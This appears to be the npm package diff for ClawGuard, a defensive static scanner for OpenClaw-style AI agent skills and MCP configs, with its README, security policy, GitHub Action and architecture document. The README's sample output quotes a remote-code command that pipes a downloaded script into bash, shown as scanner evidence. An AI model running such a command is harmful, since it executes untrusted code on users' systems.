@denial-web/clawguard 0.1.0

package/.clawguard.example.json

@@ -0,0 +1,16 @@
+{
+  "policy": "governed",
+  "failOn": "critical",
+  "failOnPolicy": true,
+  "policyFailOn": "manual_review",
+  "maxFileSizeBytes": "1mb",
+  "maxFindingsPerRulePerFile": 5,
+  "suppressions": [
+    {
+      "ruleId": "network-access",
+      "path": "skills/weather/SKILL.md",
+      "reason": "Weather skill must call the approved weather API.",
+      "expires": "2026-12-31"
+    }
+  ]
+}

package/LICENSE

@@ -0,0 +1,21 @@
+MIT License
+
+Copyright (c) 2026 ClawGuard contributors
+
+Permission is hereby granted, free of charge, to any person obtaining a copy
+of this software and associated documentation files (the "Software"), to deal
+in the Software without restriction, including without limitation the rights
+to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
+copies of the Software, and to permit persons to whom the Software is
+furnished to do so, subject to the following conditions:
+
+The above copyright notice and this permission notice shall be included in all
+copies or substantial portions of the Software.
+
+THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
+IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
+FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
+AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
+LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
+OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
+SOFTWARE.

package/README.md

@@ -0,0 +1,241 @@
+# ClawGuard
+
+Independent governance and security scanner for OpenClaw-style skills and MCP tool configs.
+
+ClawGuard helps developers answer one simple question before enabling a skill:
+
+> What could this skill do if I trusted it?
+
+This project is compatible with OpenClaw-style skill directories, but it is not affiliated with OpenClaw.
+
+## Demo Preview
+
+[Watch the repeatable demo video](docs/assets/clawguard-demo.mp4), or regenerate it locally with `npm run demo:capture`.
+
+![ClawGuard web demo showing a dependency risk scan](docs/assets/clawguard-web-demo.png)
+
+ClawGuard can also export a self-contained report for reviews, pull requests, and security handoffs:
+
+![ClawGuard HTML report showing dependency findings](docs/assets/clawguard-html-report.png)
+
+## What It Checks
+
+- Remote code download or execution
+- OpenClaw `SKILL.md` frontmatter and declared requirements
+- Metadata mismatches such as undeclared env vars, binaries, config files, network access, or install steps
+- ClawHub lockfile and origin metadata drift
+- Dependency manifests and lockfiles for npm and Python skill bundles
+- MCP/plugin config risk in `.cursor/mcp.json`, `.openclaw/mcp.json`, `.openclaw/plugins.json`, and `mcp.json`
+- OpenClaw `openclaw.plugin.json` package manifests and runtime metadata
+- Credential and secret references
+- Destructive shell commands
+- Prompt-injection style instructions
+- Broad filesystem, shell, browser, email, calendar, Slack, or GitHub permissions
+- External network access
+
+## Quick Start
+
+Run ClawGuard directly from npm:
+
+```bash
+npx @denial-web/clawguard scan ./path/to/skill
+```
+
+Or run the local checkout:
+
+```bash
+npm test
+npm run scan -- examples/risky-skill
+npm run scan -- examples/safe-skill
+npm run scan -- examples/metadata-mismatch-skill
+npm run scan -- examples/declared-api-skill
+npm run scan -- examples/risky-mcp-config
+npm run scan -- examples/safe-mcp-config
+npm run scan -- examples/openclaw-workspace
+npm run scan -- examples/clawhub-workspace
+npm run scan -- examples/dependency-risky-skill
+npm run scan -- examples/risky-openclaw-plugin
+```
+
+JSON output for automation:
+
+```bash
+npm run scan -- examples/risky-skill --json
+```
+
+Fail CI on a chosen risk level:
+
+```bash
+npm run scan -- examples/risky-skill --fail-on medium
+```
+
+Write SARIF for GitHub code scanning:
+
+```bash
+npm run scan -- examples/metadata-mismatch-skill --sarif clawguard.sarif
+```
+
+Write a human-readable HTML report:
+
+```bash
+npm run scan -- examples/metadata-mismatch-skill --html clawguard.html
+```
+
+Run the local web demo:
+
+```bash
+npm run web
+```
+
+If port `4173` is busy, use `npm run web -- --port 4174`.
+
+Regenerate README/demo assets:
+
+```bash
+npm run demo:capture
+```
+
+## Web Demo
+
+The fastest way to understand ClawGuard is the local web demo:
+
+```bash
+npm run web -- --port 4176
+```
+
+Open `http://127.0.0.1:4176`, then:
+
+1. Click `Dependency Risk`.
+2. Review the score, policy decision, required actions, and findings.
+3. Click `Download HTML` to export a self-contained report.
+
+The demo also supports pasted `SKILL.md` content and local skill folder scanning.
+
+Skip unusually large files:
+
+```bash
+npm run scan -- ./skills/some-skill --max-file-size 512kb
+```
+
+## Configuration
+
+ClawGuard automatically looks for `.clawguard.json` from the scan target upward. Start from [.clawguard.example.json](.clawguard.example.json).
+
+```json
+{
+  "policy": "governed",
+  "failOn": "critical",
+  "failOnPolicy": true,
+  "policyFailOn": "manual_review",
+  "maxFileSizeBytes": "1mb",
+  "maxFindingsPerRulePerFile": 5,
+  "suppressions": []
+}
+```
+
+Policy presets:
+
+- `personal`: warn on medium, review high, block critical.
+- `governed`: review medium, sandbox high, block critical.
+- `enterprise`: review medium, require stronger approval for high, block critical and undeclared secret access.
+
+## GitHub Action
+
+```yaml
+- uses: denial-web/clawguard@v1
+  with:
+    target: skills
+    policy: governed
+    fail-on-policy: "true"
+    sarif: clawguard.sarif
+```
+
+Upload SARIF with `github/codeql-action/upload-sarif@v3`. See [docs/GITHUB_ACTION.md](docs/GITHUB_ACTION.md) for the full workflow.
+
+## Example Output
+
+```text
+ClawGuard scan: /path/to/examples/risky-skill
+Risk: CRITICAL (100/100)
+Policy: block (personal)
+Files scanned: 1
+Files skipped: 0
+Fail threshold: critical
+
+Findings:
+- [CRITICAL] Downloads or executes remote code
+  SKILL.md:10
+  Evidence: curl https://example.com/install.sh | bash
+  Recommendation: Review the download source manually and run only in a sandbox.
+```
+
+## Roadmap
+
+- `clawguard scan <path>` CLI
+- OpenClaw `SKILL.md` metadata mismatch checks
+- `.clawguard.json` policy/config support
+- MCP/plugin config scanning
+- OpenClaw workspace skill precedence scanning
+- ClawHub metadata and lockfile scanning
+- Dependency and package lock scanning
+- Local web demo for paste-and-example scans
+- Browser folder scan support in the local web demo
+- Self-contained HTML report download from the web demo
+- SARIF output for GitHub code scanning
+- HTML reports for human review
+- GitHub Action for pull request scanning
+- Web upload demo: upload skill, get risk score
+- Rule configuration file
+- SBOM and dependency checks
+- MCP server permission analysis
+- HTML reports for sharing
+
+## Security Model
+
+ClawGuard is a static scanner. It reads skill files and reports risky patterns; it does not execute skill code, install dependencies, or contact external services.
+
+Good defaults:
+
+- No runtime dependencies
+- Skips symbolic links
+- Skips files larger than 1 MB by default
+- Supports JSON output for automation
+- Uses explainable rules instead of hidden scoring
+
+Limits:
+
+- Static analysis can miss novel or heavily obfuscated attacks.
+- Findings are risk signals, not proof of malicious intent.
+- A clean result does not guarantee a skill is safe.
+
+See [docs/THREAT_MODEL.md](docs/THREAT_MODEL.md) for the current threat model.
+See [docs/ARCHITECTURE.md](docs/ARCHITECTURE.md) for the complete product and module architecture.
+See [docs/OPENCLAW_CLAWHUB_RESEARCH.md](docs/OPENCLAW_CLAWHUB_RESEARCH.md) for the latest OpenClaw and ClawHub research notes.
+See [docs/REAL_WORLD_VALIDATION.md](docs/REAL_WORLD_VALIDATION.md) for current compatibility validation against public ClawHub sources.
+See [docs/INTEGRATION_SPEC.md](docs/INTEGRATION_SPEC.md) for OpenClaw, ClawHub, GitHub Action, web, and MCP integration plans.
+See [docs/GITHUB_ACTION.md](docs/GITHUB_ACTION.md) for CI and SARIF setup.
+See [docs/HTML_REPORTS.md](docs/HTML_REPORTS.md) for human-readable HTML reports.
+See [docs/CLAWHUB_METADATA.md](docs/CLAWHUB_METADATA.md) for ClawHub lockfile and origin metadata scanning.
+See [docs/NPM_PUBLISHING.md](docs/NPM_PUBLISHING.md) for npm trusted publishing setup.
+See [docs/DEPENDENCY_SCANNING.md](docs/DEPENDENCY_SCANNING.md) for dependency manifest and lockfile scanning.
+See [docs/WEB_DEMO.md](docs/WEB_DEMO.md) for the local web scanner.
+See [docs/DEMO_CAPTURE.md](docs/DEMO_CAPTURE.md) for repeatable screenshot and video capture.
+See [docs/DEMO_SCRIPT.md](docs/DEMO_SCRIPT.md) for the recommended demo walkthrough.
+See [docs/LAUNCH_CHECKLIST.md](docs/LAUNCH_CHECKLIST.md) for the public launch checklist.
+See [docs/GITHUB_REPO_SETUP.md](docs/GITHUB_REPO_SETUP.md) for repository description, topics, and launch settings.
+See [docs/MCP_PLUGIN_SCANNING.md](docs/MCP_PLUGIN_SCANNING.md) for MCP and plugin config scanning.
+See [docs/WORKSPACE_SCANNING.md](docs/WORKSPACE_SCANNING.md) for OpenClaw workspace precedence scanning.
+See [docs/POLICY_MODEL.md](docs/POLICY_MODEL.md) for the risk and governance decision model.
+See [docs/REPORT_SCHEMA.md](docs/REPORT_SCHEMA.md) for the versioned JSON output contract.
+See [docs/RULES.md](docs/RULES.md) for stable rule IDs and suppression guidance.
+See [docs/ARCHITECTURE_ROADMAP.md](docs/ARCHITECTURE_ROADMAP.md) for the build sequence.
+See [docs/PROJECT_REVIEW.md](docs/PROJECT_REVIEW.md) for the current hardening and launch priorities.
+See [docs/LOCAL_PROJECT_ASSETS.md](docs/LOCAL_PROJECT_ASSETS.md) for nearby local projects that can strengthen ClawGuard.
+
+## Positioning
+
+ClawGuard should be a companion project, not a fork or replacement. The goal is to make OpenClaw-style ecosystems safer by giving users a fast, explainable review before installing third-party skills.
+
+## License
+
+MIT

package/SECURITY.md

@@ -0,0 +1,33 @@
+# Security Policy
+
+ClawGuard is a defensive scanner. Please report vulnerabilities privately before opening a public issue.
+
+## Reporting
+
+Open a private security advisory on GitHub, or contact the maintainer directly.
+
+Please include:
+
+- A short description of the issue
+- Reproduction steps
+- Expected impact
+- Any sample skill or config needed to reproduce the issue
+
+## Scope
+
+In scope:
+
+- Scanner bypasses that miss clearly dangerous skill behavior
+- False negatives for credential theft, destructive shell commands, or remote execution
+- Crashes caused by malformed skill files
+- Incorrect JSON output that could break CI usage
+
+Out of scope:
+
+- Requests to scan private third-party repositories without permission
+- Social engineering against maintainers or contributors
+- Vulnerabilities in external package managers, AI models, or OpenClaw itself
+
+## Disclosure
+
+The goal is coordinated disclosure with a fix or documented mitigation before public discussion.

package/action.yml

@@ -0,0 +1,72 @@
+name: ClawGuard
+description: Scan OpenClaw-style skills and MCP configs for security and governance risk.
+
+inputs:
+  target:
+    description: Path to scan.
+    required: false
+    default: "."
+  policy:
+    description: Policy preset to apply.
+    required: false
+    default: governed
+  fail-on:
+    description: Risk level that should fail the workflow.
+    required: false
+    default: critical
+  fail-on-policy:
+    description: Whether policy decisions should fail the workflow.
+    required: false
+    default: "true"
+  policy-fail-on:
+    description: Policy decision threshold that should fail the workflow.
+    required: false
+    default: manual_review
+  config:
+    description: Optional .clawguard.json path.
+    required: false
+    default: ""
+  sarif:
+    description: Optional SARIF output path.
+    required: false
+    default: clawguard.sarif
+
+runs:
+  using: composite
+  steps:
+    - uses: actions/setup-node@v4
+      with:
+        node-version: 20
+
+    - name: Run ClawGuard
+      shell: bash
+      env:
+        INPUT_TARGET: ${{ inputs.target }}
+        INPUT_POLICY: ${{ inputs.policy }}
+        INPUT_FAIL_ON: ${{ inputs.fail-on }}
+        INPUT_FAIL_ON_POLICY: ${{ inputs.fail-on-policy }}
+        INPUT_POLICY_FAIL_ON: ${{ inputs.policy-fail-on }}
+        INPUT_CONFIG: ${{ inputs.config }}
+        INPUT_SARIF: ${{ inputs.sarif }}
+      run: |
+        args=(
+          scan
+          "$INPUT_TARGET"
+          --policy "$INPUT_POLICY"
+          --fail-on "$INPUT_FAIL_ON"
+          --policy-fail-on "$INPUT_POLICY_FAIL_ON"
+        )
+
+        if [ "$INPUT_FAIL_ON_POLICY" = "true" ]; then
+          args+=(--fail-on-policy)
+        fi
+
+        if [ -n "$INPUT_CONFIG" ]; then
+          args+=(--config "$INPUT_CONFIG")
+        fi
+
+        if [ -n "$INPUT_SARIF" ]; then
+          args+=(--sarif "$INPUT_SARIF")
+        fi
+
+        node "$GITHUB_ACTION_PATH/src/cli.js" "${args[@]}"

package/docs/ARCHITECTURE.md

@@ -0,0 +1,312 @@
+# ClawGuard Architecture
+
+ClawGuard is an independent static governance layer for OpenClaw-style skills, ClawHub packages, and MCP/tool configs. It should stay compatible with OpenClaw without pretending to be OpenClaw.
+
+## Mission
+
+ClawGuard answers one question before a user trusts a skill or plugin:
+
+> What can this thing influence, access, install, or exfiltrate?
+
+The product should be small, explainable, and useful in three moments:
+
+- Before installing a skill or plugin.
+- After installing into an OpenClaw workspace.
+- During pull requests and publishing workflows.
+
+## Product Surfaces
+
+1. CLI
+
+   Current surface: `clawguard scan <path>`.
+
+   Target surface:
+
+   - `clawguard scan <path>`
+   - `clawguard scan-skill <skill-dir>`
+   - `clawguard scan-workspace <workspace-dir>`
+   - `clawguard scan-mcp <config-path>`
+   - `clawguard explain <finding-id>`
+   - `clawguard policy check <report.json>`
+
+2. Core library
+
+   A dependency-free or low-dependency JavaScript API that other surfaces call. The CLI, GitHub Action, web demo, and MCP server should all use the same core scanner.
+
+3. GitHub Action
+
+   Pull request gate for skill repos, OpenClaw companion repos, and enterprise skill catalogs. It should output CLI text, JSON artifact, and SARIF.
+
+4. Web demo
+
+   Public demo: upload or paste `SKILL.md`, optionally upload a folder, then get a risk score with evidence and recommended action.
+
+5. MCP server
+
+   Optional later surface exposing tools like `scan_skill`, `scan_mcp_config`, `explain_finding`, and `policy_decision`.
+
+6. Install gate
+
+   Optional wrapper or integration pattern around OpenClaw/ClawHub install/update flows. It should scan a downloaded bundle before the user enables it.
+
+## Trust Boundaries
+
+ClawGuard must treat every scanned file as hostile input.
+
+Security invariants:
+
+- Never execute scanned files.
+- Never install dependencies from scanned files.
+- Do not fetch remote code by default.
+- Do not follow symbolic links by default.
+- Enforce size and file count limits.
+- Keep evidence short and bounded.
+- Do not print full secrets.
+- Keep rules deterministic and explainable.
+- Fail closed in CI when configured by policy.
+
+## High-Level Flow
+
+```mermaid
+flowchart TD
+  A["Skill folder, workspace, ClawHub metadata, or MCP config"] --> B["Target discovery"]
+  B --> C["File safety filters"]
+  C --> D["Parsers and normalizers"]
+  D --> E["Rule engine"]
+  E --> F["Risk scoring"]
+  F --> G["Policy engine"]
+  G --> H["Reporters"]
+  H --> I["CLI text"]
+  H --> J["JSON"]
+  H --> K["SARIF"]
+  H --> L["HTML"]
+  H --> M["JSONL audit"]
+```
+
+## Core Modules
+
+Current code can evolve into these modules without a rewrite:
+
+- `src/cli.js`: command parsing and terminal output.
+- `src/scanner.js`: orchestration, target walking, file safety limits, and scan result construction.
+- `src/rules.js`: initial static rule pack.
+
+Target architecture:
+
+- `src/core/scan.js`: main scanner orchestration.
+- `src/core/types.js`: shared contracts for targets, findings, scores, policies, and reports.
+- `src/fs/discovery.js`: safe traversal, symlink behavior, max file size, ignore rules.
+- `src/parsers/skill.js`: `SKILL.md` detection, frontmatter extraction, metadata normalization.
+- `src/parsers/package.js`: `package.json`, script, dependency, and lifecycle analysis.
+- `src/parsers/mcp.js`: MCP and plugin config parsing.
+- `src/parsers/clawhub.js`: ClawHub origin, lockfile, and package metadata parsing.
+- `src/rules/*.js`: rule packs by domain.
+- `src/risk/scoring.js`: severity weights, confidence, caps, and summary.
+- `src/policy/engine.js`: decisions such as allow, warn, manual review, sandbox required, and block.
+- `src/reporters/*.js`: human, JSON, SARIF, HTML, and JSONL output.
+- `src/integrations/*`: GitHub Action, OpenClaw/ClawHub wrappers, MCP server, web demo adapter.
+
+## Data Contracts
+
+Scan target:
+
+```js
+{
+  kind: "skill" | "workspace" | "mcp-config" | "clawhub-package" | "directory" | "file",
+  path: "/absolute/path",
+  source: "local" | "clawhub" | "github" | "upload",
+  metadata: {}
+}
+```
+
+Finding:
+
+```js
+{
+  id: "credential-access",
+  title: "References credentials or environment secrets",
+  severity: "high",
+  confidence: "medium",
+  category: "secret-access",
+  file: "SKILL.md",
+  line: 14,
+  evidence: "process.env.TODOIST_API_KEY",
+  recommendation: "Declare required env vars and verify least privilege.",
+  tags: ["openclaw", "frontmatter-mismatch"]
+}
+```
+
+Risk score:
+
+```js
+{
+  score: 72,
+  level: "critical",
+  findingCounts: { low: 0, medium: 1, high: 2, critical: 1 },
+  reasons: ["remote-code-execution", "undeclared-env-access"]
+}
+```
+
+Policy decision:
+
+```js
+{
+  decision: "block",
+  preset: "enterprise",
+  reason: "Critical finding and undeclared network/system access.",
+  requiredActions: ["sandbox", "manual-review", "declare-permissions"]
+}
+```
+
+## Rule Packs
+
+Core rule packs:
+
+- `core-static`: remote code execution, destructive shell, obfuscation, credential access, data exfiltration.
+- `skill-metadata`: missing name/description/version, undeclared env vars, undeclared binaries, undeclared config reads, install metadata mismatch.
+- `openclaw-permissions`: broad tool categories, high-risk workspace paths, sandbox recommendations, skill precedence warnings.
+- `clawhub-supply-chain`: origin metadata, version drift, unsigned or unknown source, install specs, package risk metadata.
+- `mcp-config`: broad MCP tools, unknown command sources, network/system capabilities, token-heavy env injection.
+- `prompt-injection`: instruction hijacking, policy bypass language, credential disclosure instructions.
+
+## Risk Model
+
+Risk should be explainable before it is clever.
+
+Base severity:
+
+- `info`: noteworthy but not dangerous.
+- `low`: likely safe but worth visibility.
+- `medium`: could surprise the user or expand trust.
+- `high`: can access secrets, files, network, tools, or external systems.
+- `critical`: can execute remote code, destroy data, silently exfiltrate, or bypass controls.
+
+Score factors:
+
+- Severity weight.
+- Number of unique findings.
+- Confidence.
+- Capability category.
+- Declared versus observed mismatch.
+- Source trust.
+- Whether sandboxing is available or required.
+- Whether the finding is in executable code, frontmatter, docs, or examples.
+
+## Policy Model
+
+The policy engine maps scan results into decisions:
+
+- `allow`: no action required.
+- `warn`: show risk, allow user to continue.
+- `manual_review`: require human approval.
+- `sandbox_required`: allow only with sandbox or limited tools.
+- `dual_approval`: require two reviewers for enterprise workflows.
+- `block`: do not install or enable.
+
+Presets:
+
+- `personal`: warn on medium, block critical.
+- `governed`: review medium, sandbox high, block critical.
+- `enterprise`: review medium, dual approval high, block critical and undeclared sensitive access.
+
+## OpenClaw Workspace Model
+
+OpenClaw skill precedence matters. A workspace skill can override a managed or bundled skill. ClawGuard should eventually scan and display:
+
+- All visible skill locations.
+- Duplicate skill names.
+- Effective winning skill by precedence.
+- Skills enabled by agent allowlists.
+- Skills shipped by plugins.
+- Skills loaded from extra directories.
+
+This becomes the foundation for an `openclaw doctor` style companion command:
+
+```bash
+clawguard openclaw scan-workspace ~/.openclaw/workspace
+```
+
+## ClawHub Model
+
+ClawGuard should consume ClawHub metadata when available, but should not rely on it as the only authority.
+
+Useful ClawHub signals:
+
+- Skill slug, version, tag, changelog, origin, and lockfile state.
+- `metadata.openclaw` runtime requirements.
+- Install specs such as `brew`, `node`, `go`, or `uv`.
+- Package family, trust, capability, compatibility, and source metadata.
+- Registry moderation and report status if exposed by API later.
+
+ClawGuard should compare registry declarations with local bundle behavior.
+
+## Reports
+
+Every report should include:
+
+- Target path and target kind.
+- Source and metadata if available.
+- Files scanned and skipped.
+- Risk score and policy decision.
+- Findings grouped by severity and category.
+- Evidence with file and line.
+- Recommendations.
+- Limitations and scan options.
+
+Machine-readable reports should preserve stable finding IDs so suppressions and trend tracking work over time.
+
+## Repository Shape
+
+Near-term repo shape:
+
+```text
+clawguard/
++-- src/
+|   +-- cli.js
+|   +-- scanner.js
+|   +-- rules.js
+|   +-- parsers/
+|   +-- policy/
+|   +-- reporters/
+|   +-- integrations/
++-- test/
++-- examples/
++-- docs/
++-- .github/workflows/
+```
+
+Long-term package shape:
+
+```text
+clawguard/
++-- packages/
+|   +-- core/
+|   +-- cli/
+|   +-- action/
+|   +-- mcp-server/
+|   +-- web/
++-- fixtures/
++-- docs/
++-- examples/
+```
+
+Stay single-package until the code is large enough to justify splitting. A clean monolith is better than a premature monorepo.
+
+## Non-Goals
+
+- Do not fork OpenClaw.
+- Do not replace ClawHub.
+- Do not claim a clean scan proves safety.
+- Do not execute untrusted code for analysis.
+- Do not build a giant agent framework inside ClawGuard.
+- Do not collect user skill data by default.
+
+## Success Criteria
+
+ClawGuard is strong when:
+
+- A developer can run it in under one minute.
+- A maintainer can add it to CI without learning OpenClaw internals.
+- A user understands why a skill is risky.
+- A security reviewer can see exact evidence.
+- An OpenClaw contributor sees it as a useful companion, not a competing platform.